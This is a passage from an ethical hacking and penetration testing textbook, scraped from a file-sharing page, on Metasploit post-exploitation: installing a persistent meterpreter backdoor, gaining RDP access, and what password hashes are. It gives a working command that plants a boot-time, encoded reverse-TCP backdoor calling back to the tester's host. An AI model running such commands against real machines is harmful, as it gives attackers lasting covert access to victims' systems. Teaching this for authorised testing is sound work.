Ethical Hacking and Penetration Testing Guide
Yüklə 22,44 Mb. Pdf görüntüsü
|
- Bu səhifədəki naviqasiya:
- What Is a Hash
|
Persistence
The Metasploit framework has two different types of backdoors built into it, namely, Metsvc and persistence. In this section, we will talk about persistence, which is a built-in meterpreter 248 ◾ Ethical Hacking and Penetration Testing Guide script that automates the backdooring process; it will automate the process of uploading and per- sistency. We can view its options by typing the following command from the meterpreter console: meterpreter>Run persistence –h To execute this script we use the following command: run persistence –X –i 5 –p 4444 –r 192.168.75.144 The command would listen for all the connections on port 4444 on our local host 192.168.75.144. The argument –X instructs the backdoor to automatically start as soon as the system boots. The –i parameter indicates the number of iterations that the payload would be encoded, which in this case is 5, since the script also does the encoding for us. The default encoder used is shikata _ ga _ nai . From the output we can see that the script automatically creates a payload “ Windows/ meterpreter/reverse _ tcp ” and sets the registry value. As the victim turns his system off, you would notice that our meterpreter session has died, and as soon as he reboots his computer we will have our meterpreter session back due to our persistence script. So till now you have learned about various backdoors and how they can be made persistent. Now we move deeper into the maintaining access phase of postexploitation, and we will dis- cuss about another approach that could be used to maintain access on our target machine. The approach involves getting access to services such as telnet, VNC, and RDP, though it’s not the stealthiest approach as the network administrator might notice it, but sometimes it can get past them and is great for a proof of concept in your penetration testing reports. Postexploitation ◾ 249 RDP (Remote Desktop) is one of the services that we would encounter most of the times; let’s discuss some of the scenarios you might encounter: 1. It requires a password. 2. Remote desktop access is disabled and you need to re-enable it. 3. Our current user is not allowed to access the remote desktop. So the first step requires us to obtain hashes. Before getting into how to obtain hashes, let’s see what they are. What Is a Hash? Passwords are stored as either a plain text or their hash values inside a filesystem or a database. A hash is basically a one-way cryptographic algorithm; the thing about a hash is that it’s irre- versible, which means that once a plain text password is sent across a hashing algorithm it’s not possible for it to return to its original state since the process is irreversible. The only way of doing it is by guessing the word and running it through the hashing algorithm and then manu- ally comparing it with our original hash. This is the process that is used to crack a password hash. Yüklə 22,44 Mb. Dostları ilə paylaş:
|